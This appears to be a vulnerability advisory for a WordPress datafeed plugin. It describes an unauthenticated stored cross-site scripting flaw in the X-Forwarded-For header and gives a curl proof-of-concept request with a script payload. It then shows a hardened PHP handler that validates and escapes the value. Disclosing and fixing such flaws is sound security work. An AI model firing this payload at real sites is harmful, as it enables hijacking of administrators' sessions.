The plugin does not sanitise and escape a header when processing a request to generate analytics data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against a logged-in admin viewing the plugin's settings.
With a feed set in the plugin, open the URL and invoke the command below:

    curl 'https://example.com/wp-admin/admin-ajax.php' \
      --data 'action=track_user_click&feedId=1' \
      -H 'X-Forwarded-For: "><script>alert("xss");</script>'

The XSS will be triggered when an admin visits the plugin's settings page (/wp-admin/admin.php?page=datafeed-settings).

Note: To set a feed, simply import the following CSV via the plugin:

    categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
    categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
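The root cause is that an attacker-controlled request header is stored verbatim and later rendered in the admin page. The following is an added example (not the plugin's code) of how a WordPress AJAX handler for this action can be hardened: the X-Forwarded-For value is only kept if it parses as an IP address, and the stored value is escaped again on output. The option name, handler structure and render function are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. Option and function names
// (datafeed_clicks, datafeed_*) are assumed for illustration.

// Return the client address only if it is a single valid IP; the header is
// attacker-controlled, so anything else is discarded rather than stored.
function datafeed_client_ip_from_request(): string {
    $xff = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';
    // X-Forwarded-For may be a comma-separated chain; take the first hop.
    $first = trim(explode(',', $xff)[0]);
    if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
        return $first;
    }
    // Fall back to the socket address, which the client cannot set freely.
    $remote = $_SERVER['REMOTE_ADDR'] ?? '';
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '';
}

// Handler for action=track_user_click. It is reachable unauthenticated
// via the wp_ajax_nopriv_ hook, so every input is validated before storage.
function datafeed_track_user_click() {
    $feed_id = absint($_POST['feedId'] ?? 0);
    $ip      = datafeed_client_ip_from_request();
    if ($feed_id === 0 || $ip === '') {
        wp_send_json_error('invalid request', 400);
    }
    $clicks   = get_option('datafeed_clicks', []);
    $clicks[] = ['feed' => $feed_id, 'ip' => $ip, 'time' => time()];
    update_option('datafeed_clicks', $clicks);
    wp_send_json_success();
}
add_action('wp_ajax_nopriv_track_user_click', 'datafeed_track_user_click');
add_action('wp_ajax_track_user_click', 'datafeed_track_user_click');

// Escape on output as well, so a stored value can never run as script in
// the settings page even if an older, unvalidated row is still present.
function datafeed_render_clicks() {
    foreach (get_option('datafeed_clicks', []) as $row) {
        printf(
            '<tr><td>%d</td><td>%s</td></tr>',
            (int) $row['feed'],
            esc_html($row['ip'])
        );
    }
}
```

Validation on input and escaping on output are independent layers; either one alone would have blocked the payload shown above, and using both covers data that was stored before the fix.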
cydave
Yes
2022-06-16 (about 7 months ago)
2022-07-27 (about 6 months ago)